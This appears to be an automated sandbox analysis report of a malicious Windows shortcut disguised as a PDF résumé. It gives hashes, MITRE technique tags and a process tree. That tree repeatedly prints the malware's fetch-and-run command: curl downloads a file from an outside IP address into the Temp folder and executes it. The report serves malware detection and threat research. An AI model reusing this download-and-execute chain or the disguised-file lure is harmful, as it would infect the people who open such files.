8fb4c2ac4de40a487c1508720386c0456da1223d4a62cd506cbb79eb5f378160

Analysis

max time kernel
91s
max time network
129s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
14/09/2022, 00:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

lebenslauf_20220808.pdf - Copy.lnk
Size

2KB
MD5

a91dac87f3daadf839337e4e636dd1fb
SHA1

ca05b847c0075d302a6f38820caadf571346671e
SHA256

b26dc83535e484cad792e00717a8173d94121ca1369b2faf247800c1252cadd9
SHA512

375e29a871b6a3c71a67ae2de1f214d117f6a1ca2f397694a864c36b61533efad326be7d20db30d9f85bcb3af3f72bd0050378e61726564851317016cc64a692

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4936 wrote to memory of 2700	4936	cmd.exe	84
PID 4936 wrote to memory of 2700	4936	cmd.exe	84
PID 2700 wrote to memory of 2164	2700	forfiles.exe	86
PID 2700 wrote to memory of 2164	2700	forfiles.exe	86
PID 2164 wrote to memory of 2240	2164	cmd.exe	87
PID 2164 wrote to memory of 2240	2164	cmd.exe	87
PID 2700 wrote to memory of 1592	2700	forfiles.exe	88
PID 2700 wrote to memory of 1592	2700	forfiles.exe	88
PID 1592 wrote to memory of 3100	1592	cmd.exe	89
PID 1592 wrote to memory of 3100	1592	cmd.exe	89
PID 2700 wrote to memory of 3744	2700	forfiles.exe	90
PID 2700 wrote to memory of 3744	2700	forfiles.exe	90
PID 3744 wrote to memory of 4376	3744	cmd.exe	91
PID 3744 wrote to memory of 4376	3744	cmd.exe	91
PID 2700 wrote to memory of 3300	2700	forfiles.exe	92
PID 2700 wrote to memory of 3300	2700	forfiles.exe	92
PID 3300 wrote to memory of 3720	3300	cmd.exe	93
PID 3300 wrote to memory of 3720	3300	cmd.exe	93
PID 2700 wrote to memory of 3372	2700	forfiles.exe	94
PID 2700 wrote to memory of 3372	2700	forfiles.exe	94
PID 3372 wrote to memory of 1060	3372	cmd.exe	95
PID 3372 wrote to memory of 1060	3372	cmd.exe	95
PID 2700 wrote to memory of 4572	2700	forfiles.exe	96
PID 2700 wrote to memory of 4572	2700	forfiles.exe	96
PID 4572 wrote to memory of 256	4572	cmd.exe	97
PID 4572 wrote to memory of 256	4572	cmd.exe	97
PID 2700 wrote to memory of 176	2700	forfiles.exe	98
PID 2700 wrote to memory of 176	2700	forfiles.exe	98
PID 176 wrote to memory of 4240	176	cmd.exe	99
PID 176 wrote to memory of 4240	176	cmd.exe	99
PID 2700 wrote to memory of 3800	2700	forfiles.exe	100
PID 2700 wrote to memory of 3800	2700	forfiles.exe	100
PID 3800 wrote to memory of 3468	3800	cmd.exe	101
PID 3800 wrote to memory of 3468	3800	cmd.exe	101
PID 2700 wrote to memory of 4624	2700	forfiles.exe	102
PID 2700 wrote to memory of 4624	2700	forfiles.exe	102
PID 4624 wrote to memory of 1216	4624	cmd.exe	103
PID 4624 wrote to memory of 1216	4624	cmd.exe	103
PID 2700 wrote to memory of 4140	2700	forfiles.exe	104
PID 2700 wrote to memory of 4140	2700	forfiles.exe	104
PID 4140 wrote to memory of 1736	4140	cmd.exe	105
PID 4140 wrote to memory of 1736	4140	cmd.exe	105
PID 2700 wrote to memory of 1988	2700	forfiles.exe	106
PID 2700 wrote to memory of 1988	2700	forfiles.exe	106
PID 1988 wrote to memory of 440	1988	cmd.exe	107
PID 1988 wrote to memory of 440	1988	cmd.exe	107
PID 2700 wrote to memory of 4768	2700	forfiles.exe	108
PID 2700 wrote to memory of 4768	2700	forfiles.exe	108
PID 4768 wrote to memory of 1800	4768	cmd.exe	109
PID 4768 wrote to memory of 1800	4768	cmd.exe	109
PID 2700 wrote to memory of 5096	2700	forfiles.exe	110
PID 2700 wrote to memory of 5096	2700	forfiles.exe	110
PID 5096 wrote to memory of 4084	5096	cmd.exe	111
PID 5096 wrote to memory of 4084	5096	cmd.exe	111
PID 2700 wrote to memory of 816	2700	forfiles.exe	112
PID 2700 wrote to memory of 816	2700	forfiles.exe	112
PID 816 wrote to memory of 3680	816	cmd.exe	113
PID 816 wrote to memory of 3680	816	cmd.exe	113
PID 2700 wrote to memory of 3956	2700	forfiles.exe	114
PID 2700 wrote to memory of 3956	2700	forfiles.exe	114
PID 3956 wrote to memory of 2868	3956	cmd.exe	115
PID 3956 wrote to memory of 2868	3956	cmd.exe	115
PID 2700 wrote to memory of 928	2700	forfiles.exe	116
PID 2700 wrote to memory of 928	2700	forfiles.exe	116

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\lebenslauf_20220808.pdf - Copy.lnk"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4936
- C:\Windows\System32\forfiles.exe
  "C:\Windows\System32\forfiles.exe" /m * /c "cmd /c curl 185.45.192.208/re.css --output-dir "C:\Users\Admin\AppData\Local\Temp" --output "xs34.cmd"&&"C:\Users\Admin\AppData\Local\Temp\xs34.cmd"&&exit"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2700
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2164
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:2240
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1592
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:3100
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3744
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:4376
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3300
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:3720
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3372
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:1060
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4572
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:256
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:176
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:4240
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3800
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:3468
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4624
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:1216
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4140
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:1736
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1988
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:440
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4768
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:1800
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5096
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:4084
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:816
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:3680
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3956
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:2868
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:928
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:2872
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:4676
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:4584
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:4884
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:5072
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:944
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:2340
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:2448
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:2644
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:4404
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:3588
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:4232
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:540
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:2716
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:900
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:3376
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:3340
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:3380
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:1748
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:4756
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:4220
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:4496
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:2460
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:3696
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:1148
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:4504
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:3244
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:3788
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:532
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:2088
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:1392
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:4472
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:3484
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:4976
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:2984
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:1416
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:3996
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:3980
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:2692
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:2256
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:2732
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:3784
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:4236
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:336
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:1820
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:1884
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:4788
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:2792
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:820
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:2008
- - C:\Windows\System32\cmd.exe
    /c curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd&&C:\Users\Admin\AppData\Local\Temp\xs34.cmd&&exit
    3⤵
    PID:3848
  - - C:\Windows\system32\curl.exe
      curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
      4⤵
      PID:4392

C:\Windows\system32\curl.exe
curl 185.45.192.208/re.css --output-dir C:\Users\Admin\AppData\Local\Temp --output xs34.cmd
1⤵
PID:3404

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Windows 7 deprecation

Loading Replay Monitor...